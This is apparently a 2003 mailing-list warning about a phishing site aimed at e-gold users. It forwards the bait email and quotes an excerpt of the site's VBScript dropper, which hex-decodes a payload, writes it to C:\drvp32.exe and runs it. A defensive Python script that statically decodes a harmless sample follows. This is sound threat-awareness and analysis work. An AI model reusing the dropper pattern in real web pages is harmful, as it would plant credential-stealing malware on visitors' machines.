OPEN LETTER to e-gold users and host company of potential fraud website: e-gold users, watch out for websites that may exploit visual basic features of MSexplorer to grab passphrases!
ATTENTION SERVICE HOSTING WEBSITE ON 69.57.150.82

CHECK your server supporting www.hintington.com, IP address 69.57.150.82.

A suspicious forged email with hyperlinks to www.hintington.com, which tries to do a data login, maybe to take advantage of an MS web browser exploit? Best to open with Mozilla or Firebird or something w/o Visual Basic exploits, and afterwards make sure you don't have c:\drvp32.exe on your hard drive.

Even the domain name and its registration are suspect. hinington.com does not exist, hintington.com has suspicious contacts, and the spam originates from around the Russia area.

You may want to remove this website ASAP and save any information about its setup if needed for discovery to avoid legal issues!

Be careful, www.hintington.com/login.php tries to launch a Visual Basic script that appears to write a program to c:\ and then run it.... scary. MOST probably to capture e-gold logins (w/ Firebird web browser it fails).

Excerpt with some of the code:

<SCRIPT language=vbs>
self.MoveTo 6000,6000
b.write(H(************** ..... ..... .....
b.Write(H(""))
b.Close
Set shell = CreateObject("WScript.Shell")
shell.run("C:\drvp32.exe")
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
H2=H2&Chr("&h"&Mid(H1,H3,2))
Next
H=H2
End Function
</SCRIPT>

---------- Forwarded message ----------
Return-Path: <[EMAIL PROTECTED]>
Received: from Fred (du-25.ks.ukrpack.net [195.230.129.25])
    by list.webengr.com (8.12.9/8.12.9) with SMTP id h7R0UMw7018612
    for <[EMAIL PROTECTED]>; Wed, 27 Aug 2003 00:30:26 GMT
Message-Id: <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
From: "Fred"<[EMAIL PROTECTED]>
To: "" <[EMAIL PROTECTED]>
Subject: Private Information!
Sender: "Fred"<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: multipart/alternative;boundary="----=_NextPart_000_0129_01C1ACD9.F0214F00"
Date: Wed, 27 Aug 2003 03:46:01 +0300
X-Virus-Scanned: clamdscan / ClamAV version 20030720
X-Spam-Status: No, hits=3.0 required=7.0
    tests=HTML_30_40,HTML_MESSAGE,HTML_WIN_OPEN,
    MSG_ID_ADDED_BY_MTA_3,NO_REAL_NAME
    version=2.55
X-Spam-Level: ***
X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)

Hello Bob.

This is your private information:

RetroBank International
http://www.retrobank.com
Login : Bob3412
Password: R6Ji1uI

Hintington Bank
http://www.hintington.com
Login : Bob3412
Password: Ug2Kl4ty

E-gold
http://www.e-gold.com
E-gold#451287
Pass: tY72Jkw

Your money still frozen...

Fred
mailto: [EMAIL PROTECTED]

---
Safe web surfing tip: Get in the habit of checking the SSL key/padlock icon in your browser and address/location bar *before* submitting sensitive information like your e-gold passphrase.
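
Added example (not part of the original message or the forwarded mail): a static triage of a saved copy of such a page that rebuilds what the H() hex decoder would write to disk and lists what the script would run, without executing anything. The SAMPLE text, its 8-byte payload and the function names are constructed for illustration; it assumes each Chr() value is written as one byte.

```python
import hashlib
import re

# Constructed sample modelled on the excerpt above; the hex payload is a
# harmless 8-byte stand-in, not data taken from the real page.
SAMPLE = '''<SCRIPT language=vbs>
self.MoveTo 6000,6000
b.write(H("4D5A9000"))
b.Write(H("03000000"))
b.Write(H(""))
b.Close
Set shell = CreateObject("WScript.Shell")
shell.run("C:\\drvp32.exe")
</SCRIPT>'''

# .write(H("...")) calls carry the hex-encoded file content.
WRITE_RE = re.compile(r'\.write\s*\(\s*H\(\s*"([^"]*)"\s*\)\s*\)', re.I)
# .run("...") names what the script launches after writing.
RUN_RE = re.compile(r'\.run\s*\(?\s*"([^"]+)"', re.I)
SCRIPT_RE = re.compile(r"<script[^>]*language\s*=\s*[\"']?(?:vbs|vbscript)", re.I)


def decode_h(hex_text):
    """Mirror the script's H(): each 2-char slice (a 1-char tail if the
    length is odd) is read as hex and becomes one byte."""
    return bytes(int(hex_text[i:i + 2], 16) for i in range(0, len(hex_text), 2))


def analyze(page):
    """Summarise the dropper behaviour visible in the page source."""
    chunks = [decode_h(h) for h in WRITE_RE.findall(page)]
    payload = b"".join(chunks)
    return {
        "vbscript": bool(SCRIPT_RE.search(page)),
        "write_calls": len(chunks),
        "payload_len": len(payload),
        "looks_like_pe": payload[:2] == b"MZ",  # DOS/PE executable magic
        "sha256": hashlib.sha256(payload).hexdigest(),
        "run_targets": RUN_RE.findall(page),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(f"{key}: {value}")
```

The sha256 of the rebuilt payload can be compared against a file found at the path in run_targets on a machine that opened the page.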